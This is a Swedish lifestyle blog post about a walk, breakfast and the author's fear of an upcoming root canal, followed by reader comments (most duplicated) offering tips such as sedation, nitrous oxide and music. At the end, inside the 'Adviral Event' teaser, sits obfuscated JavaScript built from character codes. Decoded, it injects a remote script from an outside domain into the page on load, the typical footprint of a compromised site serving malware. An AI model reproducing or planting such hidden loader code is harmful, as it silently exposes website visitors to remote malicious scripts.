havregrynsgröt, frukost och tandläkarskräck!

 

OLYMPUS DIGITAL CAMERA

 

Hej fina!

Idag har jag varit ute på en PW. Sååååå skönt! Ett raskt tempo i frisk luft! Följt av en ovanligt lugn frukost med Jonas som gjort havregryns gröt till frukost. (Tack älskling!)

 Vad brukar du ha i din gröt? 

OLYMPUS DIGITAL CAMERA

 Tandläkarbesöket gick bra igår. Röntgade munnen, fick höra dommen och fiiii fan vad dyrt!

Men jag har hittat ”rätt” tandläkare. En super trevlig tandläkare som fick mig att känna mig trygg.

Jag med min fasansfulla tandläkarskräck har lovat både honom och mig själv att slutföra detta nu. Sluta gömma mig för besöken, komma på hundratals ”bra” bortförklaringar till varför just jag inte behöver gå till tandläkaren..

Nu ska jag göra X-antal rotfyllningar. En visdomstand som måste väck och x-antal små hål. Jag frågade om detta har med min munhygien att göra. Alltså min tanbordtning… Vilket det INTE har. Jag ska dock börja använda tandtråd mer frekvent, men framförallt börja gå hos tandläkaren två gånger per år, och inte låta det gå år emellan.

Jag kan inte försäkra tänderna förrän vi har fixat allt. (i vår någon gång kommer jag att vara klar)

Men nu ska det banne mig göras. Jag har duckat för länge! Sååååå onödigt!

Den enda som det drabbar är mig själv.

Förutom själva fixet med tänderna så frågade han om jag haft det stressigt sista åren. Jag har tydligen börjat gnissla tänder (det visste jag redan) men jag ligger och biter ihop på nätterna vilket har resulterat i en inflammation i käkmusklerna, och min käke har blivit sne. Därför knäpper den, och gör ont. Stress, ångest och ångestdämpande har blivit ett resultat av detta. När övriga lagningar och ”allt” är fixat så ska vi även göra en bettskena.

-Mmmmm, sexigt! NOT! Tänk om man börjar dregla av den!?! Gör man det? 

Inom mig så svär jag över konkursen, och mina föredetta vänners svek. Dödsfallen… ja det är inte mycket att göra åt. Men livet har gått hårt åt mig. Det vet jag. Men att efterdyningar ska komma nu, att kroppen ska protestera på alla möjliga sätt. Det skrämmer mig!!!  Min hälsa har fått sig en rejäl omgång! Jag känner ju hur allting börjar falla på plats. Jag går i terapi, jag är under utredning. jag kämpar och reser mig.sakta men säkert… Nu vill jag inte ha mer elände!  Jag vill bygga upp ett bra liv för mig, Lilleman och Jonas. 

Tandläkaren påtalade dock att knölarna under haka och bakom öra INTE har med detta att göra.

Men han skickar en remiss till käk-specialisten. OCH till öran/hals doktor för att undersöka knölarna. SKÖNT att det inte är cancer. vilket lilla jag har gått omkring och nojjat för. Jag tycket verkligen om min tandläkare. Kliniken också. ÄNTLIGEN har jag hittat ”hem” i tandläkardjungeln!

Nu på fredag ska jag öppna upp den ”värsta” tanden .jag har ett stort hål, under en lagning. Blääää!

Funderar på att ta me mig Jonas som mentalt stöd!

Jag är livrädd!!!!!!!

 Några tips? Ska jag ta en grogg, en sängfösare, slå mig med något hårt i huvudet? Springa mig trött! Kräva att bli sövd?

HUR ska jag få bort rädslan? -Tips? 

Kram / My Martens 

25 Komentarer

 1. Det finns tillfälligt lugnande medel,så du nästan somnar och inte bryr dig… funkade för mig! Fråga tandläkaren eller en doktor. Kram! Monica

 2. Det är alltid svårast innan. Får du bara satt dig i stolen så är det värsta gjort. Sen begär du att få högsta dosen av bedövning och så börjar du tänka på något roligt. Kanske ditt kommande bröllop. Försök sen att få tidiga tandläkartider. Så du inte hinner att oroa dig så mycket. Kram mamma My.?

 3. Det finns tillfälligt lugnande medel,så du nästan somnar och inte bryr dig… funkade för mig! Fråga tandläkaren eller en doktor. Kram! Monica

 4. Men det kommer gå bra. När min tandläkare bedövar känns det knappt och efter det är du ju bedövad. Inget jobbigt med rotfyllning nu för tiden. Förstår om du är rädd men du oroar dej i onödan. Värst är att det är så dyrt tycker jag.

 5. Antingen ringer du tandläkaren och frågar om de kan ge dig något lugnande eller så söker man vårdcentralen och ber om detsamma. Det kan hjälpa.
  Lycka till!

 6. Det är alltid svårast innan. Får du bara satt dig i stolen så är det värsta gjort. Sen begär du att få högsta dosen av bedövning och så börjar du tänka på något roligt. Kanske ditt kommande bröllop. Försök sen att få tidiga tandläkartider. Så du inte hinner att oroa dig så mycket. Kram mamma My.💓

  • Alla kliniker erbjuder inte lustgas eftersom tandläkare måste ha speciell kompetens för detta och alla kliniker har inte lustgas men premedicinering i form av tex stesolid eller midazolam finns ju alltid att tillgå. Det ska man inte vara rädd för att fråga efter dock kostar det extra. Är man extremt tandvårdsrädd kan även vissa kliniker erbjuda kbt tillsammans med tandläkare och psykolog. I riktigt extrema fall kan man även bli remitterad till specialist tandvård under tex narkos. Men ta djupa andetag och tänk på att andas och be om att få ta några paus under behandlingen så ska det gå bra. ?

 7. Men det kommer gå bra. När min tandläkare bedövar känns det knappt och efter det är du ju bedövad. Inget jobbigt med rotfyllning nu för tiden. Förstår om du är rädd men du oroar dej i onödan. Värst är att det är så dyrt tycker jag.

 8. Antingen ringer du tandläkaren och frågar om de kan ge dig något lugnande eller så söker man vårdcentralen och ber om detsamma. Det kan hjälpa.

  Lycka till!

  • Alla kliniker erbjuder inte lustgas eftersom tandläkare måste ha speciell kompetens för detta och alla kliniker har inte lustgas men premedicinering i form av tex stesolid eller midazolam finns ju alltid att tillgå. Det ska man inte vara rädd för att fråga efter dock kostar det extra. Är man extremt tandvårdsrädd kan även vissa kliniker erbjuda kbt tillsammans med tandläkare och psykolog. I riktigt extrema fall kan man även bli remitterad till specialist tandvård under tex narkos. Men ta djupa andetag och tänk på att andas och be om att få ta några paus under behandlingen så ska det gå bra. 🙂

 9. Jag får lustgas. Det är tyvärr inte alla tandläkare som får ge det men jag har alltid letat mig fram till dem som fixar det. Det är störtskönt, helt ångest och smärtfritt och sen är det liksom bara över. Jag ska faktiskt rotfylla på torsdag. Har inte alls samma oro som tidigare inför det.

 10. Jag får lustgas. Det är tyvärr inte alla tandläkare som får ge det men jag har alltid letat mig fram till dem som fixar det. Det är störtskönt, helt ångest och smärtfritt och sen är det liksom bara över. Jag ska faktiskt rotfylla på torsdag. Har inte alls samma oro som tidigare inför det.

 11. Det finns en försäkring som kostar runt en hundring i månaden med den så kostar det inget när du går till tandläkaren allt sköts av försäkringsbolaget.

 12. Hej My.
  Jag har alltid haft tandläkarskräck men alltid tvingat mig att gå en gång om året. Det som ALLTID har hjälpt mig är ordentligt med bedövning och musik i öronen. Att lyssna på musik högt så du slipper höra alla ”vidriga” ljud är det absolut bästa jag kan rekommendera. Ja tillsammans med bedövning då ?. Lycka till.

 13. Det finns en försäkring som kostar runt en hundring i månaden med den så kostar det inget när du går till tandläkaren allt sköts av försäkringsbolaget.

 14. Hej My.
  Jag har alltid haft tandläkarskräck men alltid tvingat mig att gå en gång om året. Det som ALLTID har hjälpt mig är ordentligt med bedövning och musik i öronen. Att lyssna på musik högt så du slipper höra alla ”vidriga” ljud är det absolut bästa jag kan rekommendera. Ja tillsammans med bedövning då 😀. Lycka till.

 15. Eftersom du redan lider av panikångest så be tandläkaren om bedövning UTAN adrenalin. Det är oftast de i bedövning men alla har utan så det är bara att säga till, adrenalinet gör att du kan få hjärtklappning och panikkänslor. På hälsokost finns det något som heter ”panikdroppar/akutdroppar” som droppas på tungan, de lugnar faktiskt om man inte vill använda sig av lugnande från läkaren. Förr fick jag alltid komma i förväg till tandläkaren, fick en liten dos lugnande räckte bra för min del, fick sitta där och läsa eller nåt någon halvtimme så den hann börja verka och sen halvsov jag igenom. Nu har jag varit dit så många gånger eftersom jag precis som du dragit den ena ursäkten efter den andra osv. så jag blir inte orolig längre. Däremot irriterad att det är dyrt och att det numera är en klassfråga, det är hemskt. Känns ju som om att man ska äta julknäck och kola med omsorg, annars spricker inte bara tanden utan hela jäkla julbudgeten ? Lycka till och skönt att du hittat ”din” tandläkare ?

 16. Eftersom du redan lider av panikångest så be tandläkaren om bedövning UTAN adrenalin. Det är oftast de i bedövning men alla har utan så det är bara att säga till, adrenalinet gör att du kan få hjärtklappning och panikkänslor. På hälsokost finns det något som heter ”panikdroppar/akutdroppar” som droppas på tungan, de lugnar faktiskt om man inte vill använda sig av lugnande från läkaren. Förr fick jag alltid komma i förväg till tandläkaren, fick en liten dos lugnande räckte bra för min del, fick sitta där och läsa eller nåt någon halvtimme så den hann börja verka och sen halvsov jag igenom. Nu har jag varit dit så många gånger eftersom jag precis som du dragit den ena ursäkten efter den andra osv. så jag blir inte orolig längre. Däremot irriterad att det är dyrt och att det numera är en klassfråga, det är hemskt. Känns ju som om att man ska äta julknäck och kola med omsorg, annars spricker inte bara tanden utan hela jäkla julbudgeten 😉 Lycka till och skönt att du hittat ”din” tandläkare 🙂

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/